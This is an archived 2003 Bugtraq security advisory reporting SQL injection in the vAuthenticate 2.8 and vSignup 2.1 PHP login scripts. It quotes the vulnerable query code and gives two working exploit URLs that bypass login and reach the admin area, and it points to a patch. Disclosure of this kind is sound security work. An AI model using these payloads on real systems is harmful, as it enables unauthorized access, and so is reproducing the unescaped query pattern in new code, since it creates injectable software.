NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2003-01

From: Frog Man (leseulfrog_at_hotmail.com)
Date: Tue Jan 14 2003 - 10:38:58 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Informations :
°°°°°°°°°°°°°°
-----------------------
Product : vAuthenticate
Version : 2.8
-----------------------
Product : vSignup
Version : 2.1
-----------------------
Website : http://www.beanbug.net
Problem : SQL Injection

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
chgpwd.php :
-----------------------------------------------
<?
 if (!class_exists(auth))
 {
 include ("auth.php");
 }
 include ("authconfig.php");
 include ("check.php");
?>
-----------------------------------------------

admin/index.php :
------------------------------------------
<?
 if (!class_exists(auth))
 {
 include ("../auth.php");
 }
 include ("../authconfig.php");
 include ("../check.php");

if ($check["level"] != 1)
{
------------------------------------------

check.php :
------------------------------------------------------------------------
<?
 $CheckSecurity = new auth();
 $check = $CheckSecurity->page_check($USERNAME, $PASSWORD);
 if ($check == false)
 {
 // Feel free to change the error message below. Just make sure you put a
"\" before
 // any double quote.
 print "";
 print "Illegal Access";
 print " ";
 print "";
 print "You do not have permission to view this page.";

exit; // End program execution. This will disable continuation of
processing the rest of the page.
}

?>
------------------------------------------------------------------------

auth.php :
------------------------------------------------------------------------
function page_check($username, $password) {
$query = "SELECT * FROM authuser WHERE uname='$username' AND
passwd='$password' AND status <> 'inactive'";
$connection = mysql_connect($this->HOST, $this->USERNAME, $this->PASSWORD);

// OLD CODE - DO NOT REMOVE
// $result = mysql_db_query($this->DBNAME, $query);

        // REVISED CODE
        $SelectedDB = mysql_select_db($this->DBNAME);
        $result = mysql_query($query);

$numrows = mysql_num_rows($result);
$row = mysql_fetch_array($result);

        // CHECK IF THERE ARE RESULTS
        // Logic: If the number of rows of the resulting recordset is 0, that means
that no
        // match was found. Meaning, wrong username-password combination.
        if ($numrows == 0) {
                return false;
        }
        else {
                return $row;
        }
} // End: function page_check
------------------------------------------------------------------------

Exploits :
°°°°°°°°°°
http://[target]/chgpwd.php?USERNAME=[username]&PASSWORD='%20OR%20''='

http://[target]/admin/index.php?USERNAME='%20OR%20''='&PASSWORD='%20OR%201=1%20AND%20level='1

Patchs :
°°°°°°°°
A patch can be found on http://www.phpsecure.org.

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/vAuth-Signup.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FvAuth-Signup.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-mn

_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous !
http://search.msn.fr/worldwide.asp

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]